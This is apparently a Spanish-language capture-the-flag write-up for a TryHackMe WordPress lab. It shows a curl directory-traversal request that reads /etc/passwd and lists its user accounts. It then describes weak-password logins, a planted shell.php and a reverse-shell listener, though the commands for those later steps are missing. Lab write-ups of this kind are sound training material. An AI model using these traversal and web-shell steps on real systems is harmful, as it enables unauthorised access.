arrows-to-circleAlpinista (Wordpress)

Directory Traversal (también conocida como Path Traversal).

                                                                                                        
┌──(docker㉿docker)-[~/Tryhackme]
└─$ curl "http://mountaineer.thm/wordpress/images../etc/passwd" -s -q | grep 'sh$'

root:x:0:0:root:/root:/bin/bash
vagrant:x:1000:1000:vagrant:/home/vagrant:/bin/bash
manaslu:x:1002:1002::/home/manaslu:/bin/bash
annapurna:x:1003:1003::/home/annapurna:/bin/bash
makalu:x:1004:1004::/home/makalu:/bin/bash
kangchenjunga:x:1006:1006::/home/kangchenjunga:/bin/bash
everest:x:1010:1010::/home/everest:/bin/bash
lhotse:x:1011:1011::/home/lhotse:/bin/bash
nanga:x:1012:1012::/home/nanga:/bin/bash
k2:x:1013:1013::/home/k2:/bin/bash
                                      

Punto de apoyo inicial

Aprovechando esta vulnerabilidad, filtramos los archivos de configuración de nginx y descubrimos dónde se encuentra la vulnerabilidad y otra cosa interesante: un subdominio.

Entramos al muevo subdominio

Después de probar un par de contraseñas débiles para los nombres de usuario que descubrimos, iniciamos sesión exitosamente usando k2:k2.

Primero, revisando el correo electrónico titulado To my favorite mountain out thereen nuestra bandeja de entrada, obtenemos una contraseña.

Una vez adentro del wordprees usamos:

Al usalrlo:

Hacemos click al shell.php

Para llevarlo a vuestra maquina usamos el comando:

Y en esucha:

Last updated